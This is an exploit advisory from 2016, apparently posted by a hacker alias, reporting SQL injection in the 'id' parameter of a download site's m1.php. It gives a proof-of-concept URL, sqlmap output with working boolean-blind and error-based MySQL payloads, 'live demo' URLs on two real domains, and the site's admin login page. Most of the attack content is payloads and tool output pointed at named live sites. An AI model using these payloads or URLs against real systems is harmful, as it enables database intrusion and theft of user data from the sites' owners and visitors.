######################
# Exploit Title : Arabseed XCMS V1.0.9 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Vendor Homepage : http://arabseed.com/
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 07/09/2016
# video Proof : https://youtu.be/ABNSN3XecHw
######################
# [★] DESCRIPTION :
######################
# [+] Arabseed is an Download Website | Movies,Tv show,Songs And Forums .
# [+] Arabseed is an Famous Webiste in Arabic Country's
# [+] AND an SQL injection has been Detected in his subdomain : wn.arabseed.com
######################
# [★] Poc :
######################
# When You want to Download Any Thing From the Website You Will Notice a Redirection to the
# Subdomain : http://wn.arabseed.com/m1.php?id=[SQLi]
# [id] Get Parameter Vulnerable To SQLi
# http://wn.arabseed.com/m1.php?id=2358249'
######################
# [★] SQLmap PoC:
######################
# GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
# sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
# ---
#Parameter: id (GET)
# Type: boolean-based blind
# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
# Payload: id=(SELECT (CASE WHEN (4787=4787) THEN 4787 ELSE 4787*(SELECT 4787 FROM
# INFORMATION_SCHEMA.CHARACTER_SETS) END))
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: id=2358249 AND (SELECT 4091 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (
# ELT(4091=4091,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ---
#
# ---
# GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
######################
# [★] Live Demo :
######################
# http://wn.arabseed.com/m1.php?id=2358249
# http://wwenews.us/m1.php?id=298733
######################
# [★] Admin Dashboard :
######################
# http://www.arabseed.com/ar/user/auth/login.html
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################